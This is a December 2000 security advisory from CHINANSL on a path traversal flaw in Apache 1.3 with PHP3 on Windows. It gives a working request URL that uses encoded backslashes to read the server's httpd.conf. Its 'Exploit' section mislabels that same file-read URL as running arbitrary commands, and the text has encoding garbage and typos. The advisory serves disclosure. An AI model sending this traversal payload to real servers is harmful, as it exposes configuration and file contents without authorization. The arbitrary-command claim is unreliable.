CHINANSL Security Advisory(CSA-200011)



Topic: PHP AND APACHE Vulnerability



Release Date£º Dec 6, 2000



Affected system:

============



APACHE WEB SERVER 1.3

¡¡¡¡- Microsoft Windows NT 4.0 

¡¡¡¡- Microsoft Windows 2000

Impact: 

======



CHINANSL security team has found a security 

problem in Apache web server

where using php3. Exploitation of this vulnerability, A 

malicious user 

can access the content of file in the machine where 

Apache web server 

is runing. 



Description£º

=========



For example (Windows 2000 + Apache 1.3.6 + 

PHP3):



http://taget/index.php3.%5c../..%5cconf/httpd.conf

You will get the httpd.conf file.



Exploit:

=====



run arbitrary command :



http://taget/index.php3.%5c../..%5cconf/httpd.conf

You will get the httpd.conf file.





Solution:

=======



None



DISCLAIMS:

========

THE INFORMATION PROVIDED IS RELEASED BY 

CHINANSL "AS IS" WITHOUT WARRANTY OF ANY

KIND. CHINANSL DISCLAIMS ALL WARRANTIES, 

EITHER EXPRESS OR IMPLIED, EXCEPT FOR 

THE WARRANTIES OF MERCHANTABILITY. IN NO 

EVENTSHALL CHINANSL BE LIABLE FOR ANY 

DAMAGES WHATSOEVER INCLUDING DIRECT, 

INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS 

OF BUSINESS PROFITS OR SPECIAL DAMAGES, 

EVEN IF CHINANSL HAS BEEN ADVISED OF THE 

POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION 

OR REPRODUTION OF THE INFORMATION IS 

PROVIDED THAT THE ADVISORY IS NOT 

MODIFIED IN ANY WAY.



Copyright 1999-2000 CHINANSL. All Rights 

Reserved. Terms of use.



CHINANSL Security Team (http://www.chinansl.com)